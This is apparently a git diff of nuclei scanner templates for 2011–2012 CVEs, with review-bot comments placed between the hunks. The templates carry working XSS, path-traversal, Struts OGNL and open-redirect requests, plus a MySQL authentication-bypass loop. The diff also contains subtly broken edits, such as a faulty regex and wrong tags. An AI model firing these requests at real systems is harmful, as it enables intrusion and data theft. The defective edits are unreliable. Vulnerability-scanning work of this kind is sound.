diff --git a/nuclei-templates/CVE-2011/cve-2011-5181.yaml b/nuclei-templates/CVE-2011/cve-2011-5181.yaml new file mode 100644 index 0000000000..c7e74be15b --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-5181.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-5181 + +info: + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0392.yaml b/nuclei-templates/CVE-2012/CVE-2012-0392.yaml index c1f5562e4e..a6d6be2810 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-0392.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-0392.yaml 
@@ -5,12 +5,8 @@ info: author: pikpikcu severity: critical description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. - remediation: Developers should immediately upgrade to at least Struts 2.3.18. - reference: https://cwiki.apache.org/confluence/display/WW/S2-008 - https://blog.csdn.net/weixin_43416469/article/details/113850545 + reference: https://blog.csdn.net/weixin_43416469/article/details/113850545 tags: cve,cve2012,apache,rce,struts,java - classification: - cve-id: CVE-2012-0392 requests: - method: GET @@ -22,10 +18,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0394.yaml b/nuclei-templates/CVE-2012/CVE-2012-0394.yaml index ebd945cbd4..77f250d6b7 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-0394.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-0394.yaml 
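Review bot: The hunk drops the vendor advisory reference `https://cwiki.apache.org/confluence/display/WW/S2-008`, the `remediation:` line and the `classification:`/`cve-id:` block from CVE-2012-0392.yaml, leaving a single blog post as the only reference for a critical Struts RCE template. Those lines should be kept; the same removal of references and classification appears in the CVE-2012-0896, CVE-2012-0996, CVE-2012-4253 and CVE-2012-4547 hunks later in this chunk. The `root:.*:0:0` regex change is harmless but it no longer anchors on the trailing colon, so a short commit-message note on why it was loosened would help.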
@@ -3,9 +3,13 @@ id: CVE-2012-0394 info: name: Apache Struts <2.3.1.1 - Remote Code Execution author: tess - severity: critical + severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. + remediation: | + Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches. reference: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ - https://www.exploit-db.com/exploits/31434 @@ -13,21 +17,26 @@ info: - http://www.exploit-db.com/exploits/18329 - https://nvd.nist.gov/vuln/detail/CVE-2012-0394 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2012-0394 - cwe-id: CWE-77 + cwe-id: CWE-94 + epss-score: 0.94527 + epss-percentile: 0.99071 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: apache + product: struts shodan-query: html:"Struts Problem Report" - verified: "true" - tags: ognl,injection,edb,cve,cve2012,apache,struts - + tags: cve,cve2012,ognl,injection,edb,apache,struts variables: first: "{{rand_int(1000, 9999)}}" second: "{{rand_int(1000, 9999)}}" result: "{{to_number(first)*to_number(second)}}" -requests: +http: - method: GET path: - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}' 
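Review bot: `severity:` is lowered from critical to medium while the newly added `impact:` text states that remote attackers can execute arbitrary code, and the classification is switched from a CVSS 3.0 vector scoring 10 to a CVSS 2.0 vector scoring 6.8; the two edits read as inconsistent. If the downgrade is deliberate because the vendor disputes the issue, as the description notes, state that in the template, otherwise keep `severity: critical`. The `cwe-id` change from CWE-77 to CWE-94 is likewise unexplained and deserves a one-line justification.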
@@ -41,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/30 +# digest: 4a0a0047304502201c0033f7d56e0c4a4fd3683b701ad52e9bfbc45406087f58789beb95e48a07b4022100aa2ad6d34f8e3503d13c60241edcdd958389ba9fbf8c1c2397823123707fd2e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml b/nuclei-templates/CVE-2012/CVE-2012-0896.yaml index 17692819b2..5a0423bc41 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-0896.yaml @@ -1,28 +1,27 @@ id: CVE-2012-0896 + info: name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access author: daffainfo severity: high - description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. reference: - https://packetstormsecurity.com/files/108631/ - https://www.cvedetails.com/cve/CVE-2012-0896 - - http://secunia.com/advisories/47529 - - http://plugins.trac.wordpress.org/changeset/488883/count-per-day - classification: - cve-id: CVE-2012-0896 tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml b/nuclei-templates/CVE-2012/CVE-2012-0991.yaml deleted file mode 100644 index 7b7ae02f16..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2012-0991 -info: - name: OpenEMR 4.1 - Local File Inclusion - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. - reference: - - https://www.exploit-db.com/exploits/36650 - - https://www.cvedetails.com/cve/CVE-2012-0991 - - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/ - - http://osvdb.org/78729 - classification: - cve-id: CVE-2012-0991 - tags: cve,cve2012,lfi,openemr,traversal -requests: - - method: GET - path: - - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0996.yaml b/nuclei-templates/CVE-2012/CVE-2012-0996.yaml index b07358c35b..b096e5a0ba 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-0996.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-0996.yaml @@ -1,4 +1,5 @@ id: CVE-2012-0996 + info: name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) author: daffainfo @@ -7,22 +8,20 @@ info: reference: - https://www.exploit-db.com/exploits/36784 - https://www.cvedetails.com/cve/CVE-2012-0996 - - https://www.htbridge.ch/advisory/HTB23071 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2012-0996 tags: cve,cve2012,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/02/18 + - 200 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2012/CVE-2012-2122.yaml b/nuclei-templates/CVE-2012/CVE-2012-2122.yaml new file mode 100644 index 0000000000..f303e06e97 --- /dev/null +++ b/nuclei-templates/CVE-2012/CVE-2012-2122.yaml 
@@ -0,0 +1,61 @@ +id: CVE-2012-2122 + +info: + name: MySQL - Authentication Bypass + author: pussycat0x + severity: medium + description: | + sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value. + reference: + - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122 + - http://kb.askmonty.org/en/mariadb-5162-release-notes/ + - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html + - http://security.gentoo.org/glsa/glsa-201308-06.xml + - http://securitytracker.com/id?1027143 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P + cvss-score: 5.1 + cve-id: CVE-2012-2122 + cwe-id: CWE-287 + epss-score: 0.97019 + epss-percentile: 0.99732 + cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:* + metadata: + verified: true + vendor: oracle + product: mysql + shodan-query: product:"MySQL" + tags: cve,cve2012,js,enum,network,mssql,fuzz + +javascript: + - code: | + const mysql = require('nuclei/mysql'); + const client = new mysql.MySQLClient; + for (let i = 1; i <= 1001; i++) { + try { + const connected = client.ExecuteQuery(Host, Port, User, Pass, Query); + Export(connected); + break; + } catch { + // error + } + } + + args: + Host: "{{Host}}" + Port: 3306 + User: "root" + Pass: "wrong" + Query: "show databases;" + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + part: response + json: + - .Rows[] | .Database +# digest: 
4a0a004730450220257cea6847023e5a3eadf5c1a18c4f2a2df145542fe09c89c61ddad28bfe44e9022100e5936a8580cc7882f2e8c441aff795b4fc479fa6552599a3eb1abca1ac7f9a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-4032.yaml b/nuclei-templates/CVE-2012/CVE-2012-4032.yaml index 78738fb7c4..b1dc2b670f 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-4032.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-4032.yaml 
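Review bot: The tag line `tags: cve,cve2012,js,enum,network,mssql,fuzz` carries `mssql` for a MySQL template; it should be `mysql` so tag-based selection does not run this against the wrong service. The `metadata:` block also lacks the `max-request` entry that the other templates in this commit add, and this template can open up to 1001 connections per host, which operators and rate limiting should see (`max-request: 1001`). The bare `catch {}` in the loop drops every error, so a host that refuses all connections is indistinguishable from a non-vulnerable one; a comment explaining that failures are expected until the comparison bug is hit, and an early exit on connection-level errors rather than auth rejections, would make the template's behaviour clearer.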
@@ -6,26 +6,45 @@ info: severity: medium description: | Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or further exploitation. + remediation: | + Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4032 - https://www.exploit-db.com/exploits/37488 - https://packetstormsecurity.com/files/114541/WebsitePanel-CMS-Open-Redirect.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/76803 + - http://websitepanel.codeplex.com/workitem/224 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-4032 cwe-id: CWE-20 + epss-score: 0.00951 + epss-percentile: 0.81499 cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* - tags: cve,cve2012,redirect,websitepanel + metadata: + max-request: 1 + vendor: websitepanel + product: websitepanel + shodan-query: title:"WebsitePanel" html:"login" + tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated http: - - method: GET - path: - - "{{BaseURL}}/hosting/Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh" + - raw: + - | + POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1 + Host: {{Hostname}} + Cookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX= + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 + Content-Type: application/x-www-form-urlencoded + + 
ctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4a0a00473045022100ee9d837e70b676d11e501a5486b5c0d956d0fde58e815eee2d49972196ce1a6802207e4e2e3002e677556026c5984d545360653b9b6730f239e6470757314a608880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml index 59c53c9ec0..7bc7888e98 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml @@ -1,4 +1,5 @@ id: CVE-2012-4253 + info: name: MySQLDumper 1.24.4 - Directory Traversal author: daffainfo @@ -7,22 +8,20 @@ info: reference: - https://www.exploit-db.com/exploits/37129 - https://www.cvedetails.com/cve/CVE-2012-4253 - - http://www.osvdb.org/81609 - - http://www.osvdb.org/81615 - classification: - cve-id: CVE-2012-4253 tags: cve,cve2012,lfi + requests: - method: GET path: - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4547.yaml b/nuclei-templates/CVE-2012/CVE-2012-4547.yaml index 9025770e0a..91de9be6c3 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-4547.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-4547.yaml 
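Review bot: The regex change from `https?:\/\/` to `http?:\/\/` is a regression: in that form the `?` makes the `p` optional rather than the `s`, so a `Location: https://...interact.sh` header no longer matches and the template misses TLS redirects. Restore `(?:https?:\/\/|\/\/|\/\\\\|\/\\)?`; the same `http?://` form sits as a context line in the CVE-2011-5252.yaml hunk earlier in this chunk and should be corrected there too. The new raw request also hard-codes a Chrome `User-Agent`; a comment on why the login form needs it would help.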
@@ -8,11 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/36164 - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 - - http://awstats.sourceforge.net/docs/awstats_changelog.txt - - http://openwall.com/lists/oss-security/2012/10/29/7 - classification: - cve-id: CVE-2012-4547 - tags: cve,cve2012,xss,awstats + tags: cve,cve2020,xss,awstats requests: - method: GET @@ -35,6 +31,4 @@ requests: - type: status status: - - 200 - -# Enhanced by mp on 2022/02/21 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-4768.yaml b/nuclei-templates/CVE-2012/CVE-2012-4768.yaml deleted file mode 100644 index cc4e27599b..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4768.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2012-4768 -info: - name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt - - http://osvdb.org/85319 - - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html - classification: - cve-id: CVE-2012-4768 - tags: cve,cve2012,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4940.yaml b/nuclei-templates/CVE-2012/CVE-2012-4940.yaml deleted file mode 100644 index b89245caf1..0000000000 
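Review bot: The tag line changes `cve2012` to `cve2020` for `CVE-2012-4547`, which will misfile the template under the wrong year in tag-based runs; restore `tags: cve,cve2012,xss,awstats`. The hunk also removes the awstats changelog and oss-security references and the `classification:` block, as the CVE-2012-0392 hunk does, so the remaining references should at least include the vendor changelog.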
--- a/nuclei-templates/CVE-2012/CVE-2012-4940.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2012-4940 - -info: - name: Axigen Mail Server Filename Directory Traversal - author: dhiyaneshDk - severity: high - description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. - reference: - - https://www.exploit-db.com/exploits/37996 - - https://nvd.nist.gov/vuln/detail/CVE-2012-4940 - tags: cve,cve2012,axigen,lfi,mail - classification: - cve-id: CVE-2012-4940 - -requests: - - method: GET - path: - - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini' - - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini' - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by cs on 2022/02/25 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4982.yaml b/nuclei-templates/CVE-2012/CVE-2012-4982.yaml index 2e859ee809..f427fcec55 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-4982.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-4982.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html - https://nvd.nist.gov/vuln/detail/CVE-2012-4982 - http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html + - https://github.com/tr3ss/newclei classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-4982 cwe-id: CWE-20 - epss-score: 0.00763 - epss-percentile: 0.79082 + epss-score: 0.00357 + epss-percentile: 0.71561 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022038910e0cb3be99200a8bcd988110043e50952c2a72983c860643bbda07a7816402206cba8ce4110069dde15118d53dd83acef5fa819d9d9981e17c838daa45fcaccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-5321.yaml b/nuclei-templates/CVE-2012/CVE-2012-5321.yaml index 16f166f839..c9a6ae8f37 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-5321.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-5321.yaml 
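Review bot: The added reference `https://github.com/tr3ss/newclei` points at a tooling repository rather than an advisory or vendor page for CVE-2012-4982; consumers use the reference list to verify a finding, so either drop it or note what it documents. The epss-score and epss-percentile edit reads as a routine refresh and needs nothing further.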
@@ -1,31 +1,43 @@ id: CVE-2012-5321 info: - name: TikiWiki CMS/Groupware v8.3 - Open Redirect + name: TikiWiki CMS Groupware v8.3 - Open Redirect author: ctflearner severity: medium description: | tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks and potential unauthorized access to sensitive information. + remediation: | + Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-5321 - https://www.exploit-db.com/exploits/36848 - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 classification: - cvss-metrics: (AV:N/AC:M/Au:N/C:P/I:P/A:N) + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 + epss-score: 0.01926 + epss-percentile: 0.87386 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* - tags: cve,cve2012,redirect,TikiWiki,CMS/Groupware + metadata: + max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + tags: cve,cve2012,redirect,tikiwiki,groupware,tiki http: - method: GET path: - - "{{BaseURL}}/tiki-featured_link.php?type=f&url=http://interact.sh" + - "{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh" matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4a0a0047304502200b62703373e2f3e77eb8233099e45a6a4a8f45c65a0bc93dff836558b4cfb495022100c5fdc97c693593011215fd012ea56914958970b70e474b725121e087a9eeb6b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of 
file diff --git a/nuclei-templates/CVE-2012/CVE-2012-6499.yaml b/nuclei-templates/CVE-2012/CVE-2012-6499.yaml index 51013875b4..7eade9c1f7 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-6499.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-6499.yaml 
@@ -6,25 +6,39 @@ info: severity: medium description: | Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed. reference: - - https://www.exploit-db.com/exploits/36540 + - https://www.exploit-db.com/exploits/18350 - https://wordpress.org/plugins/age-verification - https://nvd.nist.gov/vuln/detail/CVE-2012-6499 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 + epss-score: 0.01204 + epss-percentile: 0.83755 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* - tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification + metadata: + max-request: 1 + vendor: age_verification_project + product: age_verification + tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification,age_verification_project http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.interact.sh" + - raw: + - | + POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1 + Host: {{Hostname}} + + redirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970 matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 
4b0a00483046022100c6dc5b887e4ace1683bd8c4f901328e58b99002898e4ca33ed7adf2eead45ac6022100a33436c7adb1f789a65f478a78a2d645cf1b42813d472aa216d6621bb137fe5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-0901.yaml b/nuclei-templates/CVE-2012/cve-2012-0901.yaml similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-0901.yaml rename to nuclei-templates/CVE-2012/cve-2012-0901.yaml diff --git a/nuclei-templates/CVE-2012/CVE-2012-0981.yaml b/nuclei-templates/CVE-2012/cve-2012-0981.yaml similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-0981.yaml rename to nuclei-templates/CVE-2012/cve-2012-0981.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-0991.yaml b/nuclei-templates/CVE-2012/cve-2012-0991.yaml new file mode 100644 index 0000000000..c9bbdc69ff --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-0991.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-0991 + +info: + name: OpenEMR 4.1 - Local File Inclusion + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + reference: + - https://www.exploit-db.com/exploits/36650 + - https://www.cvedetails.com/cve/CVE-2012-0991 + tags: cve,cve2012,lfi,openemr,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 
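Review bot: The new raw POST request sends a form-encoded body without a `Content-Type: application/x-www-form-urlencoded` header, unlike the raw request added to CVE-2012-4032.yaml in this same commit; a PHP handler populates `$_POST` (and so `redirect_to`) only when that header is present, so the redirect is unlikely to fire and the template would return a false negative, unless nuclei injects the header, which I could not confirm from here. Add `Content-Type: application/x-www-form-urlencoded` after the `Host:` line. The exploit-db reference also changes from 36540 to 18350 without explanation; the new id is worth confirming.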
diff --git a/nuclei-templates/CVE-2012/CVE-2012-3153.yaml b/nuclei-templates/CVE-2012/cve-2012-3153.yaml old mode 100644 new mode 100755 similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-3153.yaml rename to nuclei-templates/CVE-2012/cve-2012-3153.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-4768.yaml b/nuclei-templates/CVE-2012/cve-2012-4768.yaml new file mode 100644 index 0000000000..5c198776f4 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-4768.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4768 + +info: + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - 